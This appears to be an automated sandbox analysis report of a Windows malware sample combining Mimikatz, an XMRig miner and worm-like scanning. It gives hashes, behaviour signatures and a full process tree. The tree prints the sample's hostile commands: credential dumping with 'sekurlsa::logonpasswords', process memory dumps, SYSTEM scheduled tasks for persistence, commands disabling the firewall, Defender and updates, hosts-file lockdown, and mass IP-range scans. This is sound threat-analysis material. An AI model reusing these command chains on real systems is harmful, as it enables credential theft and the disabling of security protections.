Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-09-2024 20:34

General

  • Target

    2024-09-22_de8a9da953f7e9f9c2a39db11bd13c45_hacktools_icedid_mimikatz.exe

  • Size

    8.9MB

  • MD5

    de8a9da953f7e9f9c2a39db11bd13c45

  • SHA1

    d11ece79a1173f9004c2873574386d21347f9bbf

  • SHA256

    0b58f3762a08646ad20b2f8fec175ff217da2d2365cc840f45dfcb29f63149c4

  • SHA512

    c136f97102dd8d3a02839a4c3405504a75358ca83326fc51169223f8ed43336c54350c52040d6ca1adf687175e10454a596f855876e15aac9944a1479a76b323

  • SSDEEP

    196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (19488) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 10 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 28 IoCs
  • Loads dropped DLL 12 IoCs
  • UPX packed file 34 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 43 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:2148
      • C:\Windows\TEMP\itsztifig\ttibui.exe
        "C:\Windows\TEMP\itsztifig\ttibui.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4004
    • C:\Users\Admin\AppData\Local\Temp\2024-09-22_de8a9da953f7e9f9c2a39db11bd13c45_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-09-22_de8a9da953f7e9f9c2a39db11bd13c45_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2784
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\plerrhtg\cyetmst.exe
        2⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:4676
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:1288
        • C:\Windows\plerrhtg\cyetmst.exe
          C:\Windows\plerrhtg\cyetmst.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:3840
    • C:\Windows\plerrhtg\cyetmst.exe
      C:\Windows\plerrhtg\cyetmst.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1224
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2324
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:4216
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
              PID:3996
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
              • System Location Discovery: System Language Discovery
              PID:4388
            • C:\Windows\SysWOW64\cacls.exe
              cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
              3⤵
              • System Location Discovery: System Language Discovery
              PID:3600
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
                PID:3384
              • C:\Windows\SysWOW64\cacls.exe
                cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                3⤵
                • System Location Discovery: System Language Discovery
                PID:4828
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static del all
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:3744
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add policy name=Bastards description=FuckingBastards
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:1396
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filteraction name=BastardsList action=block
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:4756
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c C:\Windows\imkhtretj\hjrbkiipz\wpcap.exe /S
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1908
              • C:\Windows\imkhtretj\hjrbkiipz\wpcap.exe
                C:\Windows\imkhtretj\hjrbkiipz\wpcap.exe /S
                3⤵
                • Drops file in Drivers directory
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops file in System32 directory
                • Drops file in Program Files directory
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1260
                • C:\Windows\SysWOW64\net.exe
                  net stop "Boundary Meter"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3568
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop "Boundary Meter"
                    5⤵
                      PID:1408
                  • C:\Windows\SysWOW64\net.exe
                    net stop "TrueSight Meter"
                    4⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:3440
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop "TrueSight Meter"
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:4908
                  • C:\Windows\SysWOW64\net.exe
                    net stop npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:4816
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop npf
                      5⤵
                        PID:372
                    • C:\Windows\SysWOW64\net.exe
                      net start npf
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:3100
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 start npf
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:4248
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net start npf
                  2⤵
                    PID:4348
                    • C:\Windows\SysWOW64\net.exe
                      net start npf
                      3⤵
                        PID:4396
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 start npf
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:4752
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net start npf
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:2384
                      • C:\Windows\SysWOW64\net.exe
                        net start npf
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:1704
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 start npf
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:4944
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c C:\Windows\imkhtretj\hjrbkiipz\tlbncsgty.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\imkhtretj\hjrbkiipz\Scant.txt
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:3188
                      • C:\Windows\imkhtretj\hjrbkiipz\tlbncsgty.exe
                        C:\Windows\imkhtretj\hjrbkiipz\tlbncsgty.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\imkhtretj\hjrbkiipz\Scant.txt
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • System Location Discovery: System Language Discovery
                        PID:4036
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c C:\Windows\imkhtretj\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\imkhtretj\Corporate\log.txt
                      2⤵
                      • Drops file in Windows directory
                      • System Location Discovery: System Language Discovery
                      PID:1972
                      • C:\Windows\imkhtretj\Corporate\vfshost.exe
                        C:\Windows\imkhtretj\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4004
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "iiumjiulf" /ru system /tr "cmd /c C:\Windows\ime\cyetmst.exe"
                      2⤵
                        PID:4708
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:1628
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /create /sc minute /mo 1 /tn "iiumjiulf" /ru system /tr "cmd /c C:\Windows\ime\cyetmst.exe"
                          3⤵
                          • System Location Discovery: System Language Discovery
                          • Scheduled Task/Job: Scheduled Task
                          PID:3792
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "iletgirik" /ru system /tr "cmd /c echo Y|cacls C:\Windows\plerrhtg\cyetmst.exe /p everyone:F"
                        2⤵
                          PID:5008
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:3692
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /create /sc minute /mo 1 /tn "iletgirik" /ru system /tr "cmd /c echo Y|cacls C:\Windows\plerrhtg\cyetmst.exe /p everyone:F"
                            3⤵
                            • System Location Discovery: System Language Discovery
                            • Scheduled Task/Job: Scheduled Task
                            PID:4920
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "gkrqurthy" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\itsztifig\ttibui.exe /p everyone:F"
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:1788
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            3⤵
                              PID:3668
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /create /sc minute /mo 1 /tn "gkrqurthy" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\itsztifig\ttibui.exe /p everyone:F"
                              3⤵
                              • System Location Discovery: System Language Discovery
                              • Scheduled Task/Job: Scheduled Task
                              PID:2008
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                            2⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Location Discovery: System Language Discovery
                            PID:5056
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                            2⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Location Discovery: System Language Discovery
                            PID:1396
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                            2⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Location Discovery: System Language Discovery
                            PID:2420
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh ipsec static set policy name=Bastards assign=y
                            2⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Location Discovery: System Language Discovery
                            PID:5036
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                            2⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Location Discovery: System Language Discovery
                            PID:672
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                            2⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            PID:1560
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                            2⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Location Discovery: System Language Discovery
                            PID:3704
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh ipsec static set policy name=Bastards assign=y
                            2⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            PID:800
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                            2⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Location Discovery: System Language Discovery
                            PID:2524
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                            2⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Location Discovery: System Language Discovery
                            PID:2412
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                            2⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            PID:4180
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh ipsec static set policy name=Bastards assign=y
                            2⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Location Discovery: System Language Discovery
                            PID:4736
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c net stop SharedAccess
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:4540
                            • C:\Windows\SysWOW64\net.exe
                              net stop SharedAccess
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:4888
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop SharedAccess
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:3436
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c netsh firewall set opmode mode=disable
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:3684
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh firewall set opmode mode=disable
                              3⤵
                              • Modifies Windows Firewall
                              • Event Triggered Execution: Netsh Helper DLL
                              • System Location Discovery: System Language Discovery
                              PID:3680
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c netsh Advfirewall set allprofiles state off
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:3760
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh Advfirewall set allprofiles state off
                              3⤵
                              • Modifies Windows Firewall
                              • Event Triggered Execution: Netsh Helper DLL
                              • System Location Discovery: System Language Discovery
                              PID:780
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c net stop MpsSvc
                            2⤵
                              PID:3612
                              • C:\Windows\SysWOW64\net.exe
                                net stop MpsSvc
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:1216
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop MpsSvc
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2892
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c net stop WinDefend
                              2⤵
                                PID:1748
                                • C:\Windows\SysWOW64\net.exe
                                  net stop WinDefend
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1520
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop WinDefend
                                    4⤵
                                      PID:4212
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c net stop wuauserv
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3244
                                  • C:\Windows\SysWOW64\net.exe
                                    net stop wuauserv
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2548
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop wuauserv
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2472
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c sc config MpsSvc start= disabled
                                  2⤵
                                    PID:3188
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc config MpsSvc start= disabled
                                      3⤵
                                      • Launches sc.exe
                                      • System Location Discovery: System Language Discovery
                                      PID:3032
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c sc config SharedAccess start= disabled
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1712
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc config SharedAccess start= disabled
                                      3⤵
                                      • Launches sc.exe
                                      • System Location Discovery: System Language Discovery
                                      PID:1328
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c sc config WinDefend start= disabled
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3280
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc config WinDefend start= disabled
                                      3⤵
                                      • Launches sc.exe
                                      • System Location Discovery: System Language Discovery
                                      PID:648
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c sc config wuauserv start= disabled
                                    2⤵
                                      PID:3520
                                      • C:\Windows\SysWOW64\sc.exe
                                        sc config wuauserv start= disabled
                                        3⤵
                                        • Launches sc.exe
                                        PID:1020
                                    • C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe
                                      C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe -accepteula -mp 816 C:\Windows\TEMP\imkhtretj\816.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4984
                                    • C:\Windows\TEMP\xohudmc.exe
                                      C:\Windows\TEMP\xohudmc.exe
                                      2⤵
                                      • Executes dropped EXE
                                      • Drops file in System32 directory
                                      • Suspicious use of SetWindowsHookEx
                                      PID:1844
                                    • C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe
                                      C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe -accepteula -mp 420 C:\Windows\TEMP\imkhtretj\420.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2352
                                    • C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe
                                      C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe -accepteula -mp 2148 C:\Windows\TEMP\imkhtretj\2148.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1124
                                    • C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe
                                      C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe -accepteula -mp 2552 C:\Windows\TEMP\imkhtretj\2552.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2736
                                    • C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe
                                      C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe -accepteula -mp 2672 C:\Windows\TEMP\imkhtretj\2672.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1880
                                    • C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe
                                      C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe -accepteula -mp 2912 C:\Windows\TEMP\imkhtretj\2912.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3248
                                    • C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe
                                      C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe -accepteula -mp 3148 C:\Windows\TEMP\imkhtretj\3148.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1060
                                    • C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe
                                      C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe -accepteula -mp 3824 C:\Windows\TEMP\imkhtretj\3824.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4776
                                    • C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe
                                      C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe -accepteula -mp 3912 C:\Windows\TEMP\imkhtretj\3912.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2528
                                    • C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe
                                      C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe -accepteula -mp 3976 C:\Windows\TEMP\imkhtretj\3976.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2760
                                    • C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe
                                      C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe -accepteula -mp 4056 C:\Windows\TEMP\imkhtretj\4056.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:648
                                    • C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe
                                      C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe -accepteula -mp 2544 C:\Windows\TEMP\imkhtretj\2544.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:860
                                    • C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe
                                      C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe -accepteula -mp 2364 C:\Windows\TEMP\imkhtretj\2364.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3580
                                    • C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe
                                      C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe -accepteula -mp 1528 C:\Windows\TEMP\imkhtretj\1528.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4700
                                    • C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe
                                      C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe -accepteula -mp 444 C:\Windows\TEMP\imkhtretj\444.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1544
                                    • C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe
                                      C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe -accepteula -mp 2256 C:\Windows\TEMP\imkhtretj\2256.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3984
                                    • C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe
                                      C:\Windows\TEMP\imkhtretj\ajetkkrtt.exe -accepteula -mp 3896 C:\Windows\TEMP\imkhtretj\3896.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3200
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c C:\Windows\imkhtretj\hjrbkiipz\scan.bat
                                      2⤵
                                        PID:3344
                                        • C:\Windows\imkhtretj\hjrbkiipz\tziqghqri.exe
                                          tziqghqri.exe TCP 194.110.0.1 194.110.255.255 445 512 /save
                                          3⤵
                                          • Executes dropped EXE
                                          • Drops file in Windows directory
                                          • System Location Discovery: System Language Discovery
                                          PID:4960
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                        2⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4532
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:776
                                        • C:\Windows\SysWOW64\cacls.exe
                                          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:556
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:4012
                                        • C:\Windows\SysWOW64\cacls.exe
                                          cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:996
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                          3⤵
                                            PID:5008
                                          • C:\Windows\SysWOW64\cacls.exe
                                            cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                            3⤵
                                              PID:4212
                                        • C:\Windows\SysWOW64\ascsoo.exe
                                          C:\Windows\SysWOW64\ascsoo.exe
                                          1⤵
                                          • Executes dropped EXE
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious use of SetWindowsHookEx
                                          PID:2512
                                        • C:\Windows\system32\cmd.EXE
                                          C:\Windows\system32\cmd.EXE /c C:\Windows\ime\cyetmst.exe
                                          1⤵
                                            PID:2932
                                            • C:\Windows\ime\cyetmst.exe
                                              C:\Windows\ime\cyetmst.exe
                                              2⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetWindowsHookEx
                                              PID:4620
                                          • C:\Windows\system32\cmd.EXE
                                            C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\itsztifig\ttibui.exe /p everyone:F
                                            1⤵
                                              PID:2404
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                2⤵
                                                  PID:4792
                                                • C:\Windows\system32\cacls.exe
                                                  cacls C:\Windows\TEMP\itsztifig\ttibui.exe /p everyone:F
                                                  2⤵
                                                    PID:4460
                                                • C:\Windows\system32\cmd.EXE
                                                  C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\plerrhtg\cyetmst.exe /p everyone:F
                                                  1⤵
                                                    PID:2240
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                      2⤵
                                                        PID:776
                                                      • C:\Windows\system32\cacls.exe
